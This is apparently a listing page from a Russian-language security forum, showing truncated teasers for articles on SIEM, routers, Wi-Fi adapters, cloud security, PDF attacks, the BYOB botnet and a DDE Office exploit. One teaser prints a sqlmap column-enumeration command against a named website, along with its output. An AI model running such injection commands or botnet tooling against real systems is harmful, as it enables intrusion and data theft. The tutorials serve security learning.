• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Кибербезопасность

По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.

Статья Управление информацией по вопросам безопасности и менеджмент событий безопасности (Security Information and Event Management (SIEM))

  • 2 496
  • 0
Продукты программного обеспечения и службы SIEM объединяют ( (SIM)) и менеджмент событий безопасности ((security event management)SEM). Они предоставляют анализ предупреждений о безопасности в режиме реального времени, создаваемых сетевым оборудованием и приложениями.

Поставщики продают SIEM в качестве программного обеспечения, в качестве устройств или в качестве управляемых служб; эти продукты также используются для регистрации данных безопасности и создания отчетов в целях согласования.

Несмотря на то, что индустрия решила использовать термин ‘ ’ в качестве всеобъемлющего термина для этого...

Статья Железная шкатулка №1: Обзор китайских роутеров GL.iNet

  • 25 503
  • 40
Однажды, рыская по cети в поисках идеального роутера, я наткнулся на китайских мастеров из компании GL.iNet, которые, следуя принципам открытости ПО и DIY, оснащают свои устройства довольно обширными возможностями для модификации и экспериментов с прошивкой OpenWrt. Далее проведу краткий обзор роутеров, которые меня заинтересовали.

GL.iNet GL-AR300M

Самая новая модель "компактной" серии (39 г, 58x58x25 мм) роутеров GL.iNet. Выпущена в начале 2017 года. Лично я склонился именно к этому решению, так как никаких специфических предпочтений, вроде наличия 4GPIO и прочего, у меня нет.

- Процессор Qualcomm Atheros QCA9531 SoC, 650 МГц
- Cкорость соединения до 300 Мбит/с
- Стандарты связи: 802.11 b/g/n
- ОЗУ: 128 Мб DDR2 от EtronTech
- Флэш-память: 16 Мб (Nor) от Winbond + 128 Мб (Nand) от GigaDevice в стандартной и расширенной версиях
- Интерфейсы: WAN, LAN, USB 2.0...

Статья Замена TP Link TL-WN722N

  • 12 568
  • 35
Многие, кто только начинает интересоваться вардрайвингом, задаются вопросом, «Какое оборудование приобрести?». Конечно же качественное, от производителя. Но оно и довольно дорогое. Всегда нужно стремиться к совершенству, но на первых порах можно обойтись и недорогим но качественным оборудованием.

Хороший Wi-Fi адаптер Tl-WN722N v.1. Но он снят с производства, и его днём с огнём не найдёшь. Покопавшись в сети я нашёл ему достойную замену TP Link TL-WN722N, китайский клон без роду без племени.

Я приобрёл себе его. Сделан он качественно, аккуратно. Вот описание продавца к этому адаптеру:

Atheros
AR9271 802.11n 150 Мбит/с Беспроводной PC USB WiFi адаптер + 3dBi Wi-Fi антенны


Особенности:
  • Поддержка установки драйвера для TP-LINK tl-wn722n.
  • 3dbi Съемная внешняя антенна.
  • Поддержка Windows 7/8/8.1/10 и Linux.
  • Совместим с устройствами 802.11b/g/n.
  • Скорость беспроводной передачи данных составляет до 150мбит/с
...

Статья SQLMAP-обнаружение и эксплуатация SQL инъекции: детальное разъяснение (2 часть)

  • 8 019
  • 8
SQLMAP-обнаружение и эксплуатация SQL инъекции: детальное разъяснение (часть 1)

Шаг 4: Список столбцов в целевой таблице выбранной базы данных с использованием SQLMAP SQL инъекции:

Теперь нам нужно перечислить все столбцы целевой таблицы user_info базы данных clemcoindustries с помощью SQLMAP SQL инъекции. SQLMAP SQL инъекция упрощает выполнение следующей команды:

Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D
gbhackers-T user_i
nfo --columns

Это возвращает 5 записей из целевой таблицы user_info базы данных clemcoindustries.

Код:
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'gbhackers '
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10)...

Статья BYOB - Создаем собственный ботнет.

  • 14 534
  • 21
Всем привет. Решил создать статью про ботнет. Давненько не было статей про ботнет.
Разработчик -== malwaredllc
Страница разработчика -== malwaredllc/byob

Введение.

botnet.png

BYOB (Build Your Own Botnet) - это проект с открытым исходным кодом, который предоставляет платформу для исследователей и разработчиков безопасности для создания и управления базовым ботнетом, чтобы углубить свое понимание сложной вредоносной программы, которая заражает миллионы устройств каждый год и порождает современные бот-сети, чтобы улучшить их способность разработать контрмеры против этих угроз.

Он разработан, чтобы позволить разработчикам легко реализовывать свой собственный код и добавлять интересные новые функции без необходимости писать RAT (Remote Administration Tool) или C2 (Command & Control server) с нуля.

Код:
Server.
illuminated-server-room-panel-660495303-5a24933d4e46ba001a771cd1.jpg

Сервер управления с постоянной базой данных и консолью...

Статья Самые важные факторы, которые необходимо знать любой организации для обеспечения безопасности их облака

  • 2 638
  • 1
aK6dJ1532560801.png


Обеспечение безопасности облака (Cloud Security Solutions) является одной из самых важных задач для любой организации, и в данном вопросе очень важно быть уверенным, что было принято оптимальное решение, которое сможет защитить облако от максимального диапазона кибератак.

Увеличение количества организаций, которые переводят свои операции в облако для достижения большей гибкости, высокой доступности, также увеличивает риски с точки зрения безопасности.

Существует множество проблем безопасности, которые нам необходимо знать для любой организации, прежде чем переходить к обеспечению безопасности облака.

В основном это утечка данных, захват учетных записей, угроза инсайдеров, таким образом, злоупотребление облачными службами являются наиболее важными проблемами безопасности облачных сервисов.

Если вы находитесь на рынке в поисках нового продукта...

Статья Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS)

  • 9 524
  • 25
DDE-Exploit.jpg


DDE экплойт также известен как динамический обмен данными, позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем. Хакеры использовали этот метод для запуска вредоносных скриптов с целью взлома системы.

Об этом в Microsoft сообщали такие службы, как Sensepost, Etienne Stalmans, и Saif El-Sherei, но он не был исправлен, поскольку многие приложения используют протокол DDE. Этот эксплойт не требует включения макрофункции.

Необходимые условия – DDE exploit
  • Машина использующая операционную систему Windows
  • Microsoft Office (любая версия)
  • KALI LINUX
Мы вынуждены будем импортировать Metasploit эксплойт.
Загрузите его из GitHub с помощью командного терминала.

Код:
wget...

Статья Mega vs Dropbox: самая важная проблема с кибербезопасностью в облаке

  • 3 758
  • 0
Cybersecurity-in-the-Cloud.jpg


Mega vs Dropbox, если история – это что-то, откуда мы черпаем опыт, тогда мы наверняка можем утверждать, что нет 100% гарантии киберзащиты от взлома или DDoS атак. Когда мы покупаем облачные сервисы, мы переживаем о двойниках или тройниках, поскольку мы должны полагаться на поставщиков с третьей стороны, предлагающих нам безопасность данных с беспрепятственным доступом.

Что касается сегодняшнего обсуждения, мы выбрали анализ безопасности, предложенный Dropbox против безопасности, предложенной Mega. Мы выбрали первое, потому что он пользуется мировой славой, а наша отдельная концентрация на последнем объясняется тем, что специалисты утверждают, что он занимает топовую позицию в отделе безопасности.

Mega vs Dropbox – новичок встречает ветерана

Mega – один из новичков в данной сфере, и мы рекомендуем почитать, по крайней мере, обзор о...

Статья [новость - перевод] Как создать исследовательский центр разработки принципов кибербезопасности

  • 3 420
  • 0
Cyber.jpg


Вы ищете команду, которая поможет определить наличие кибер-атак и других проблем в вашей сети и устранить их? Вы имеете уникальную возможность узнать, как это сделать с помощью данного руководства.

Созданию качественного программного обеспечения положили начало великие люди, но иногда, к сожалению, их бывает сложно найти. Так как сфера технической индустрии является очень конкурентной сферой, то более важным считается создание компетентной и опытной команды по разработке планируемого вами программного обеспечения.

Вам нужна команда, члены которой знают друг друга, и у них не возникнет никаких разногласий. Вот наиболее эффективные способы создания . В первом разделе мы покажем вам, что искать в хороших членах команды. В заключительном разделе вы узнаете, как создать культуру...

Статья Атака на PDF, несколько способов ушатать Adobe

  • 5 168
  • 12
На сегодня для вас офисная статейка: учимся потрошить старый добрый универсальный формат делопроизводственных работничков - PDF.
PDF пожалуй самый популярный общепринятый международный формат документов, хороший формат, отработанный со всех углов, какие только имеются в киберпространстве. Он используются в коммерческих и некоммерческих организациях, дома и на службе, официально и подпольно, да вообще везде, где есть производная слова документ. Формат научились криптозащищать без существенной потери быстродействия железа, параллельно учились вскрывать и даже паковать вирусы в него (один из таких примеров будет продемонстрирован в следущей статье, шучу в следующей статье я покажу на сколько уязвимы секретные чаты в Телеграм/взломаю все ключи). Одна из самых интересных, тесно связанных историй с pdf, коснулась криптоанархиста Дмитрия Склярова, который был схвачен в Штатах после публичной презентации своего дара, разнесшего, как два байта...